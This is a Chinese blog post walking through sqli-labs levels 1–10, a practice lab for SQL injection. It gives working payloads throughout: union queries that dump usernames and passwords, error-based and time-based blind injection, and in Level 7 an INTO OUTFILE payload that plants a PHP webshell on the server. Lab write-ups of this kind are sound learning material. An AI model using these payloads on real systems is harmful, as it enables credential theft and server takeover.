

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#795548">
  <meta name="description" content="">
  <meta name="author" content="一叶枯舟">
  <meta name="keywords" content="">
  
  <title>sqli labs master 学习 - 一叶枯舟</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>一叶枯舟</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli labs master 学习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-05-11 20:41" pubdate>
        2021年5月11日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      27
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqli labs master 学习</h1>
            
            <div class="markdown-body">
              <h1 id="sqli-labs-master-学习"><a class="markdownIt-Anchor" href="#sqli-labs-master-学习"></a> sqli labs master 学习</h1>
<h2 id="less-1"><a class="markdownIt-Anchor" href="#less-1"></a> Less 1</h2>
<p>1.首先判断注入点</p>
<p>在http请求后加上？id=1’ and 1=1 – -，显示如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image002.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>把后面改为1=2显示如下，可以看到sql语句应该是正常执行了，没有报错</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image004.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以说明存在字符型注入，猜测语句为select… where id=’’这样的语句。</p>
<p>接下来判断注入点</p>
<p>判断字段数</p>
<p>输入?id=1’ order by 3 – -时候会显示如下，说明内部字段数为3</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image006.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=0’ union select 1,2,3 – -回显如下</p>
<p>（id为0是为了不让返回值干扰注入）</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image008.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>说明2,3的位置存在注入点</p>
<p>使用联合查询注入查看表，输入?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() – -回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image010.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>得到emails,referers,uagents,users这几个表</p>
<p>查询字段，输入?id=0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ – -回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image012.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image014.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现里面有username，password字段，可以尝试查询这个列里的值，输入?id=0’ union select 1,group_concat(username,0x3f,password),3 from users-- -</p>
<p>0x3f是？的ascii码值，放在中间作为参数好区分两个列的值</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image016.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="less-2"><a class="markdownIt-Anchor" href="#less-2"></a> Less 2</h2>
<p>首先查看注入类型，输入?id=1 and 1=1 – -回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image072.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1 and 1=2 – -回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image074.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>说明存在数字型注入，之后步骤同less1，输入的代码相同，如下</p>
<p>判断注入点，输入?id=1 order by 3 – -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_imag06.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>回显如下，说明回显字段数为3，之后步骤同less1，可以使用less1的注入代码去掉前面单引号即可</p>
<p>最后输入输入?id=0 union select 1,group_concat(username,0x3f,password),3 from users-- -得到用户名和密码</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image708.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="less-3"><a class="markdownIt-Anchor" href="#less-3"></a> Less 3</h2>
<p>先输入?id=1’，显示如下，根据报错信息，可以知道后面还有个括号，所以尝试输入?id=1’) and 1=1 – -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image22.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1’) and 1=1 – -回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image044.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>说明存在基于字符’)的字符型注入</p>
<p>输入?id=1’) order by 3 – -回显如下，说明返回数据有3个字段</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_imaw006.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>后面输入同less1，将less1的语句改为id=1’)即可</p>
<p>最后输入?id=0 union select 1,group_concat(username,0x3f,password),3 from users-- -得到用户名和密码列对应的数值</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_ima008.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="less-4"><a class="markdownIt-Anchor" href="#less-4"></a> Less 4</h2>
<p>输入?id=1’但是页面无变化</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_i.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1&quot;页面报错如下，猜测可能是双引号加）</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_ima.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1&quot;) order by 4 – -发现回显如下，说明我们的判断可能是对的</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_imag76.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1&quot;) order by 3 – -回显正常说明有3个字段</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_ie008.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>之后注入代码同less1，id后面改为&quot;)其他同，最后得到用户名和密码的列内容为</p>
<p>输入</p>
<p>?id=0&quot;) union select 1,group_concat(username,0x3f,password),3 from users-- -得到用户名和密码列对应的数值</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_im.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="less-5"><a class="markdownIt-Anchor" href="#less-5"></a> Less 5</h2>
<p>首先查询id=1，但是发现不会返回任何数据，只会返回you are in……</p>
<p>如果输入别的，就会报错</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image34.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1’ and 1=1 – -未报错，说明sql查询语句可能同less1使用‘号闭合</p>
<p>输入?id=1’ order by 3 – -，回显正常，说明字段数为3</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_ima344.jpg" srcset="/img/loading.gif" lazyload alt="img"><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_imageqew.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用报错注入查询数据库名，输入?id=0’union select count(*),1, concat(’~’,(select database()),’~’,floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p>原理：利用concat（）连接函数和随机数函数floor(rand()*2)的结果只能在0-1来产生报错，使用information_schema.tables 或 information_schema.columns者两个表来查询，然后就会产生很多结果达到报错concat函数加~号是为了能更好看清楚查询到的数据库</p>
<p>效果如下：可以知道查询到的数据库名是security</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_im0.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>查询表名，输入</p>
<p>?id=0’ union select count(*),1, concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),’~’,floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p>从0开始输入到4的时候（limit 3，1前的数3表示第几个表），回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_im10.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>说明数据库中第四个表为user</p>
<p>查询列字段名，输入?id=0’ union select count(*),1, concat(’~’,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),’~’, floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_im1.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>说明表中第一个列的字段是id，同理可以找到username、password等字段</p>
<p>接下来查询内容，输入?id=0’ union select count(*),1, concat(’~’,( select username from users limit 1,1),’~’, floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p>和</p>
<p>?id=0’ union select count(*),1, concat(’~’,( select password from users limit 1,1),’~’, floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image088.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image8016.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以查找到Angelina的用户名和密码，查找其他账号密码方式同上</p>
<h2 id="less-6"><a class="markdownIt-Anchor" href="#less-6"></a> Less 6</h2>
<p>输入id=1回显如下，说明还是通过布尔值来判断注入</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image3002.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试输入?id=1’，回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image0044.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1&quot;报错如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image00634.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>说明存在双引号的注入</p>
<p>使用报错注入查询数据库名，输入?id=0” union select count(*),1, concat(’~’,(select database()),’~’,floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_imag32e008.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以通过报错注入回显出结果，其他步骤和payload同less5，使用less5的注入代码，并且把id=0后的单引号改为双引号即可</p>
<p>最后查询表中内容输入如下</p>
<p>接下来查询内容，输入?id=0&quot;union select count(*),1, concat(’~’,( select username from users limit 1,1),’~’, floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p>和</p>
<p>?id=0&quot; union select count(*),1, concat(’~’,( select password from users limit 1,1),’~’, floor(rand()*2)) as a from information_schema.tables group by a – -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image01045.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image01223.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="less-7"><a class="markdownIt-Anchor" href="#less-7"></a> Less 7</h2>
<p>输入?id=1,?id=1’,?id=1&quot;测试注入点，当输入id=1’的时候报错，显示如下，说明存在单引号字符型注入</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image01124.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>输入?id=1’ and 1=1 – - 报错，显示如下，说明可能存在括号</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image01326.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>测试有多少个括号，最后输入?id=1’ )) and 1=1 – -未报错，显示如下，说明得需要2个括号闭合</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image011238.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>提示我们得使用outfile函数导出文件，然而这个函数是有要求的，首先我们得知道绝对的文件物理路径，还得对这个路径有可写入的权限</p>
<p>在地址栏输入</p>
<p>?id=1’)) union select 1,2,’<?php @eval($_POST["cmd"]);?>’ into outfile “D:\phpstudy_pro\WWW\sqli-labs-master\Less-7”-- -</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image04220.gif" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到这个路径确实写入了我们的一句话木马，然后用菜刀连接</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image02322.gif" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这时可以连接上并且可以对文件进行操作了</p>
<h2 id="less-8"><a class="markdownIt-Anchor" href="#less-8"></a> Less 8</h2>
<p>输入?id=1，回显如下</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image02302.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以说明是布尔型注入，输入?id=1’没有回显，说明可能是基于单引号的布尔注入</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image00%E4%B8%BA4.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试使用报错注入的时候没有回显，所以我们不能用报错注入。尝试时间盲注</p>
<p>输入?id=1’ and if(length(database())=8,sleep(5),1)-- -</p>
<p>*这里不正确执行select 1页面正常返回，正确则执行select sleep(5)页面沉睡5秒后返回</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image00r36.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>有明显延迟，说明数据库长度为8，接下来爆破库名</p>
<p>?id=1’and if(ascii(substr(database(),1,1))=115,sleep(5),1)-- -</p>
<p>如下图，有明显延迟，说明库的第一个字符acii码为115（s）</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image0sd208.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>其他字段调整(substr(database(),x,1)中x大小得出数据库名字是’security’</p>
<p>接下来爆破表的内容</p>
<p>?id=1’and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),1,1))=117 ,sleep(5),1)-- -</p>
<p>这里limit x,1),y,1)的x表示第x+1个表，y表示表名第y位数，用ASCII码判断</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image0102.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>延迟明显说明猜测正确，这里最后得出第三个表是user表</p>
<p>接下来爆表中的名字，输入</p>
<p>?id=1’and if(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 3,1),1,1))=105, sleep(5),1)-- -</p>
<p>这里limit x,1),y,1)的x表示第x+1列，y表示列名第y位数，用ASCII码判断</p>
<p>然后爆破列的内容用</p>
<p>?id=1’and if(ascii(substr((select username from users limit 0,1),1,1))=68, sleep(5),1) – -</p>
<p>这里limit x,1),y,1)的x表示第x+1个内容，y表示内容的第y位数，用ASCII码判断</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image01342.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>请求有明显延迟则判断成功</p>
<h2 id="less-9"><a class="markdownIt-Anchor" href="#less-9"></a> Less 9</h2>
<p>这里不管输入什么，下图输入1或者1’，回显总是You are in…</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image32014.jpg" srcset="/img/loading.gif" lazyload alt="img"><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_imag3e016.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>题目提示是基于时间的盲注，经过尝试，当输入?id=1’ and sleep(5) – -延迟明显，说明注入成功</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_23image018.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>由于我们上一关就是使用的时间盲注，所以直接用上一题的payload</p>
<p>输入?id=1’ and if(length(database())=8,sleep(5),1)-- -，查询数据库长度</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image3020.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>延迟明显，说明可以注入，之后操作同less8</p>
<h2 id="less-10"><a class="markdownIt-Anchor" href="#less-10"></a> Less 10</h2>
<p>这里和上一关一样，不管输入什么都会显示you are in….，通过测试，当输入?id=1&quot; and sleep(5) – -时，延迟明显，说明存在双引号注入</p>
<p><img src="/2021/05/11/sqli-labs-master-%E5%AD%A6%E4%B9%A0/clip_image123022.jpg" srcset="/img/loading.gif" lazyload alt="img"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web%E5%AD%A6%E4%B9%A0/">web学习</a>
                    
                      <a class="hover-with-bg" href="/categories/web%E5%AD%A6%E4%B9%A0/%E5%AD%A6%E4%B9%A0/">学习</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web%E5%AD%A6%E4%B9%A0/">web学习</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！，本博客仅用于交流学习，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。
文章作者拥有对此站文章的修改和解释权。如欲转载此站文章，需取得作者同意，且必须保证此文章的完整性，包括版权声明等全部内容。未经文章作者允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。若造成严重后果，本人将依法追究法律责任。 阅读本站文章则默认遵守此规则。
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/05/12/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">XXE 漏洞学习</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/04/15/unlink%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">
                        <span class="hidden-mobile">unlink漏洞学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
